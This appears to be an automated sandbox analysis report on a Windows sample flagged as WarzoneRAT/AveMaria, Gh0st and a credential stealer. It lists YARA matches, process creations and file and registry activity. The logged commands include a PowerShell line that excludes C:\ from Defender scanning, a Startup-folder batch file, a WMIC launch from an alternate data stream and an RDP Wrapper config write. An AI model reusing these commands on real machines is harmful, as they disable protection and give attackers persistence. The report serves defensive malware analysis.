          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 4.2.images.exe.22e053f.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.22f89af.2.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 4.3.images.exe.720700.2.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 4.3.images.exe.720700.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 4.2.images.exe.2ce0000.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
          Source: 0.3.SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe.721d18.7.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: String function: 00407FC0 appears 33 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: String function: 02D20969 appears 47 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: String function: 02D135E5 appears 40 times
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000000.242916125.0000000000554000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe, 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeBinary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Users\user\AppData\Local\Microsoft Vision\Jump to behavior
          Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@18/18@0/1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1D49C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_00406750 LoadResource,LockResource,SizeofResource,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeReversingLabs: Detection: 24%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
          Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
          Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'
          Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeProcess created: C:\ProgramData\images.exe C:\ProgramData\images.exe
          Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
          Source: C:\ProgramData\images.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D1F619 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,
          Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_caqnsxdv.wy2.ps1Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D2290F CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,
          Source: C:\ProgramData\images.exeCode function: 4_3_02F494E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeCode function: 0_2_02D220B8 RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6376:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_01
          Source: C:\ProgramData\images.exeFile written: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\ProgramData\images.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to behavior
          Source: C:\ProgramData\images.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
          Source: SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: images.exe, images.exe, 00000004.00000003.426226423.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, images.exe, 00000004.00000002.522256093.0000000000987000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.521736326.00000000008F2000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.525479497.000000000498B000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422022458.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422705804.0000000002F42000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000003.422349023.0000000004AE1000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wuser32.pdb source: images.exe, images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wuser32.pdbUGP source: images.exe, 00000004.00000002.524034966.00000000043EE000.00000004.00000800.00020000.00000000.sdmp, images.exe, 00000004.00000002.524593557.00000000047F0000.00000040.00001000.00020000.00000000.sdmp
